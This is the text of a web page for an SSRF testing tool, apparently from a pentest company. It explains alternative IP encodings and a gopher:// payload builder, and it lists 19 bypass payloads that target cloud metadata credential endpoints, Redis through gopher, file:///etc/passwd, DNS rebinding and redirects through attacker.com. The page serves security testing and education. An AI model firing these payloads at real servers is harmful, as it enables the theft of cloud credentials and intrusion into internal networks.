// tool · server-side

SSRF helper: IP representations and allowlist bypass

SSRF happens when the server can be tricked into making requests it shouldn't — cloud metadata, internal services, loopback. Generate every representation of an IP, craft gopher:// payloads and browse the bypass techniques.

Runs 100% in your browser · nothing is sent to the target

IP representation generator

Shortcuts:

gopher:// payload builder

The gopher:// scheme sends raw bytes to a TCP port — including CRLF — letting you "speak" protocols like Redis or HTTP through an SSRF. Build the payload below.

Why it works: gopher:// has no headers: every byte you type goes raw to the socket. The %0d%0a (CRLF) separate commands, letting you inject text protocols into internal services.

Bypass techniques

19 techniques

  • Embedded credentials (userinfo) Allowlist bypass
    http://allowed.com@169.254.169.254/

    Why it works: Everything before @ is userinfo, not the host. The client connects to 169.254.169.254, but a naive filter "sees" allowed.com.

  • Fragment confusion (#) Allowlist bypass
    http://169.254.169.254#@allowed.com/

    Why it works: Parsers disagree on where the # (fragment) begins. Some treat allowed.com as the host; the real client uses 169.254.169.254.

  • Trailing dot (FQDN) Allowlist bypass
    http://allowed.com.evil.com/

    Why it works: Suffix allowlists (endsWith("allowed.com")) fall for malicious subdomains. http://169.254.169.254./ also works in some resolvers.

  • Case / encoding variation Allowlist bypass
    http://ALLOWED.com%2f@169.254.169.254/

    Why it works: Case-sensitive comparisons or ones that do not normalize %2f/%2e let the URL through. Always normalize before comparing.

  • AWS IMDSv1 — credentials
    http://169.254.169.254/latest/meta-data/iam/security-credentials/

    Why it works: IMDSv1 needs no token: a simple SSRF reads the role name and then the temporary keys (AccessKey/SecretKey/Token).

  • AWS IMDSv2 — PUT token
    http://169.254.169.254/latest/api/token

    Why it works: IMDSv2 requires fetching a token via PUT on this endpoint, with the X-aws-ec2-metadata-token-ttl-seconds: 21600 header, then sending it back in X-aws-ec2-metadata-token. Only exploitable if the SSRF allows arbitrary methods/headers.

  • GCP — Metadata-Flavor
    http://169.254.169.254/computeMetadata/v1/?recursive=true

    Why it works: GCP requires the Metadata-Flavor: Google header. The ?recursive=true path dumps everything, including service-account tokens.

  • Azure — Metadata:true header
    http://169.254.169.254/metadata/instance?api-version=2021-02-01

    Why it works: Azure requires the Metadata: true header and the api-version parameter. Use /identity/oauth2/token to grab managed tokens.

  • Alibaba Cloud
    http://100.100.100.200/latest/meta-data/ram/security-credentials/

    Why it works: Alibaba uses the IP 100.100.100.200 with an AWS-like layout and no token by default.

  • Kubernetes / kubelet
    http://127.0.0.1:10255/pods

    Why it works: In clusters, the kubelet read-only port (10255) lists pods and secrets. The node metadata API (https://169.254.169.254/) also exposes credentials when reached via SSRF.

  • gopher:// → Redis Protocols
    gopher://127.0.0.1:6379/_%2A1%0d%0a%244%0d%0aPING%0d%0a

    Why it works: gopher:// sends raw bytes, including CRLF (%0d%0a), letting you speak Redis/SMTP/FastCGI through the SSRF. Use the builder above.

  • dict:// — probe/exfil Protocols
    dict://127.0.0.1:6379/info

    Why it works: dict:// sends a single line to the port — great for fingerprinting internal services (Redis, memcached) and reading banners.

  • file:// — local read Protocols
    file:///etc/passwd

    Why it works: If the fetcher accepts the file:// scheme, the SSRF turns into arbitrary file read on the server.

  • ftp:// / ldap:// Protocols
    ftp://127.0.0.1:11211/

    Why it works: Alternate schemes reach services speaking text protocols. Swap scheme/port to hit memcached, LDAP (ldap://127.0.0.1:389/), etc.

  • DNS rebinding (TOCTOU) DNS rebinding
    http://rebind.attacker.com/

    Why it works: The host resolves to a public IP at validation time and to 127.0.0.1/link-local at request time. Exploits the check-vs-use window (TOCTOU).

  • Ready-made rebind services DNS rebinding
    1u.ms

    Why it works: 1u.ms/rbndr.us flip between two IPs per lookup; nip.io/sslip.io resolve straight to the embedded IP. Generate the names in the panel above.

  • URL parser divergence Parser confusion
    http://127.0.0.1\@allowed.com/

    Why it works: The validator and the HTTP client use different parsers (RFC 3986 vs WHATWG). Backslash, whitespace and unicode "/" make each see a different host. Unicode-"/" variant: http://allowed.com\u2044@127.0.0.1/.

  • IDNA / homoglyph Parser confusion
    http://①②⑦.⓪.⓪.①/

    Why it works: Unicode characters normalize to ASCII at resolution time (IDNA/NFKC). The filter compares the unicode form; the client resolves the real IP.

  • 30x redirect to internal Parser confusion
    https://attacker.com/r

    Why it works: The first URL is public and passes the allowlist; the server replies 30x pointing at the internal target, and the client follows the redirect.

For authorized testing, research and education only. The tool only transforms text in your browser — it makes no requests. Do not test targets without explicit permission.

// reference

What is SSRF

SSRF (Server-Side Request Forgery) happens when the server can be tricked into making requests to a destination the attacker chooses. Because the request originates inside the infrastructure, it often crosses the firewall and reaches internal services, loopback and the cloud metadata endpoint.

The most valuable target is usually the metadata endpoint (169.254.169.254), which can hand over the machine role's temporary credentials. Defenses that only block strings fail because there are many ways to write the same IP and many ways to confuse the URL parser.

Alternative IP representations

An IP is a 32-bit integer, and many HTTP clients accept its decimal, octal, hexadecimal and IPv6 forms. The generator above produces all of them; below is why each one fools text filters:

  • Decimal (32-bit integer) — An IP is a 32-bit integer. inet_aton() and many HTTP clients accept the raw decimal value, dodging filters that only match the 1.2.3.4 form.
  • Hex (0x, dotless) — The same integer in hex with the 0x prefix. inet_aton-style parsers turn 0x… back into the original IP; text allowlists do not.
  • Hex per octet — Each octet as 0x.., dot-separated. Useful when the parser requires 4 parts but accepts each part in hex.
  • Octal per octet (leading zero) — Octets prefixed with 0 are read as octal by inet_aton. 0177.0.0.1 = 127.0.0.1, while the filter sees a different string.
  • Octal (dotless) — The whole integer in octal, leading 0. A rare form that several parsers still normalize to the destination IP.
  • Short form (3 parts)inet_aton accepts a.b.c where the last part is 16-bit. 127.0.1 becomes 127.0.0.1, escaping validators that expect 4 octets.
  • Short form (2 parts)a.b, last part 24-bit. 127.1 = 127.0.0.1. A classic for shortening loopback and slipping past naive regexes.
  • Octet overflow (mod 256) — Some parsers apply % 256 to the octet. …+256 resolves to the same IP but slips past checks that only block the canonical value.
  • IPv4-mapped IPv6[::ffff:1.2.3.4] is the IPv4 embedded in IPv6. Dual-stack stacks connect to the real IPv4, but the IPv4 filter never inspects bracketed hosts.
  • IPv6-mapped (hex groups) — Same idea, last two groups in hex. Yet another textual form that resolves to the destination IPv4.
  • IPv6-mapped (expanded) — Uncompressed [0:0:0:0:0:ffff:..:..]. Useful against filters that recognize the compressed ::ffff: but not the expanded form.
  • Wildcard DNS — nip.io<ip>.nip.io resolves to that IP via DNS. Beats domain-based allowlists (the host is an "external" name pointing inward).
  • Wildcard DNS — sslip.io — Same concept as nip.io, with hyphen syntax (a-b-c-d.sslip.io). A fallback when one of the services is filtered/unavailable.

Bypass techniques by category

Allowlist bypass

Userinfo (@), fragment (#), trailing dot, case differences and encoding make the validator see an allowed host while the HTTP client connects somewhere else.

Cloud metadata

AWS (IMDSv1/v2), GCP, Azure, Alibaba and Kubernetes expose internal endpoints that return credentials and configuration — the classic SSRF prize.

Protocols

Beyond http://, schemes like gopher://, dict://, file:// and ftp:// let you read files and talk to text services (Redis, SMTP) through the SSRF.

DNS rebinding

Services like nip.io resolve to an arbitrary IP; rebinding swaps the IP between validation and fetch, defeating checks that only look at the URL string.

Parser confusion

Divergences between the validator and the HTTP client (IDNA, normalization, redirects) make the two interpret the same URL differently.

Frequently asked questions

What is SSRF (Server-Side Request Forgery)?

It's when the server can be tricked into making requests to destinations the attacker chooses — cloud metadata, internal services or loopback — bypassing the network firewall by using the server itself as a proxy.

Why do alternative IP representations bypass filters?

An IP is a 32-bit integer, and many HTTP clients accept its decimal, octal or hexadecimal forms. Filters that only compare the 127.0.0.1 form let 2130706433, 0177.0.0.1 or 0x7f.0.0.1 through.

What is DNS rebinding?

It's a technique where a domain you control first resolves to an allowed IP (passing validation) and, on the next request, to an internal IP — exploiting the window between the check and the use (TOCTOU).

What is the gopher:// payload for?

The gopher:// scheme sends raw bytes to a TCP port, including CRLF. That lets you "speak" text protocols like Redis or HTTP through an SSRF and turn a blind read into an action.

Suspect SSRF in one of your apps?

IntruderLabs runs the pentest that finds and proves these flaws before an attacker does — under your brand, with white-label reporting.

Talk to us →